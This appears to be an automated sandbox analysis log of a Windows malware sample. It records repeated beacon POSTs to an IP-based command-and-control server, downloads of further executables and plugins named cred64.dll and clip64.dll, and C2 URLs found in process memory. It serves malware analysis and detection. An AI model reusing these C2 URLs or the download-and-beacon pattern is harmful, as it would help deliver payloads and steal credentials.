Source: global traffic	HTTP traffic detected: POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4

Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147
Source: unknown	TCP traffic detected without corresponding DNS query: 185.81.68.147

Source: C:\Users\user\Desktop\yINR7uQlPr.exe

Code function: 0_2_00007FF79E381CDC InternetOpenW,Sleep,InternetOpenUrlW,InternetOpenUrlW,InternetCloseHandle,Sleep,HttpQueryInfoA,InternetCloseHandle,InternetCloseHandle,Sleep,InternetCloseHandle,InternetOpenUrlW,InternetCloseHandle,Sleep,HttpQueryInfoA,GetProcessHeap,RtlAllocateHeap,InternetCloseHandle,InternetCloseHandle,InternetReadFile,InternetCloseHandle,InternetCloseHandle,

0_2_00007FF79E381CDC

Source: global traffic	HTTP traffic detected: GET /ctx.exe HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Source: global traffic	HTTP traffic detected: GET /ssg.exe HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Source: global traffic	HTTP traffic detected: GET /update.exe HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Source: global traffic	HTTP traffic detected: GET /gfx.exe HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Source: global traffic	HTTP traffic detected: GET /7vhfjke3/Plugins/cred64.dll HTTP/1.1Host: 185.81.68.147
Source: global traffic	HTTP traffic detected: GET /7vhfjke3/Plugins/clip64.dll HTTP/1.1Host: 185.81.68.147
Source: global traffic	HTTP traffic detected: GET /update.exe HTTP/1.1Host: 185.81.68.147
Source: global traffic	HTTP traffic detected: GET /update.exe HTTP/1.1Host: 185.81.68.147If-Modified-Since: Thu, 12 Dec 2024 05:53:20 GMTIf-None-Match: "4b400-6290c54e671ba"
Source: global traffic	HTTP traffic detected: GET /ssg.exe HTTP/1.1Host: 185.81.68.147

Source: unknown

HTTP traffic detected: POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3

Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000DAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/7vhfjke3/Plugins/clip64.dll
Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000DAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/7vhfjke3/Plugins/clip64.dllb
Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000D60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/7vhfjke3/Plugins/cred64.dll
Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000D60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/7vhfjke3/Plugins/cred64.dll$
Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000E00000.00000004.00000020.00020000.00000000.sdmp, Gxtuum.exe, 00000014.00000002.3380715534.0000000000D17000.00000004.00000020.00020000.00000000.sdmp, Gxtuum.exe, 00000014.00000002.3380715534.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000016.00000002.2679991024.000001ED567B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.3377277785.000000000328F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.3378440733.0000000003410000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.3378440733.00000000033DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/7vhfjke3/index.php
Source: rundll32.exe, 0000001E.00000002.3378440733.00000000033DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/7vhfjke3/index.php#
Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000E00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/7vhfjke3/index.php$
Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000E00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/7vhfjke3/index.php.0
Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000E00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/7vhfjke3/index.php0000840101
Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000E00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/7vhfjke3/index.php30
Source: rundll32.exe, 00000018.00000002.2689505871.000001C0C6BDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/7vhfjke3/index.php6
Source: rundll32.exe, 00000018.00000002.2689505871.000001C0C6BDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/7vhfjke3/index.php8
Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000E00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/7vhfjke3/index.php830101
Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000E00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/7vhfjke3/index.php95
Source: rundll32.exe, 0000001D.00000002.3377277785.00000000032C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/7vhfjke3/index.php:
Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000E00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/7vhfjke3/index.php?(
Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000E00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/7vhfjke3/index.php?)
Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000DAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/7vhfjke3/index.php?scr=1
Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000DAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/7vhfjke3/index.php?scr=1eC
Source: rundll32.exe, 00000018.00000002.2689505871.000001C0C6C0D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000018.00000002.2689505871.000001C0C6B48000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000018.00000002.2689505871.000001C0C6BDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/7vhfjke3/index.php?wal=1
Source: rundll32.exe, 00000016.00000002.2680605134.000001ED586C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/7vhfjke3/index.php?wal=11
Source: rundll32.exe, 00000018.00000002.2689505871.000001C0C6BDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/7vhfjke3/index.php?wal=1Files
Source: rundll32.exe, 0000001D.00000002.3377277785.00000000032C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/7vhfjke3/index.phpA
Source: rundll32.exe, 0000001E.00000002.3378440733.0000000003410000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/7vhfjke3/index.phpE
Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000E00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/7vhfjke3/index.phpE7
Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000E00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/7vhfjke3/index.phpJ7
Source: rundll32.exe, 0000001E.00000002.3378440733.0000000003410000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/7vhfjke3/index.phpK
Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000E00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/7vhfjke3/index.phpR0
Source: rundll32.exe, 00000016.00000002.2679991024.000001ED567B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/7vhfjke3/index.phpU
Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000E00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/7vhfjke3/index.php_(
Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000E00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/7vhfjke3/index.phpi7
Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000E00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/7vhfjke3/index.phpl0
Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000E00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/7vhfjke3/index.phpo/
Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000E00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/7vhfjke3/index.phpq0
Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000DAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/ssg.exe
Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000DAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/ssg.exe6J
Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000DAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/update.exe
Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000DAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/update.exe/J
Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000DAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/update.exeDJ%
Source: rundll32.exe, 00000016.00000002.2680605134.000001ED586C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000018.00000002.2689505871.000001C0C6BDA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.3378440733.0000000003410000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/
Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000016.00000002.2679991024.000001ED567B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000018.00000002.2689505871.000001C0C6B48000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.3377277785.000000000328F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.3378440733.00000000033DF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.3378440733.0000000003427000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.php
